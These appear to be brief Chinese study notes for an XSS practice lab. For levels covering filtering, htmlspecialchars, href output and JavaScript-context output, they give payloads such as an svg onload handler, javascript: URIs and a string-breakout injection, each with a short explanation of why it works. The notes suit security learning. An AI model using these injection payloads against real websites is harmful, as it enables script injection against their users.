一、xss之过滤
<svg onload=alert("过关啦")>
二、xss之htmlspecialchars
javascript:alert(123)
原理:输入测试文本为herf的属性值和内容值,所以转换思路直接变为js代码OK了
三、xss之href输出
JavaScript:alert('假客套')
原理:测试一个文本,输入提交之后,成了为了蓝色文本的herf属性值,所以我们把属性值改为js代码就OK了
四、xss之js输出
拼接新的js代码
'; alert('XSS'); //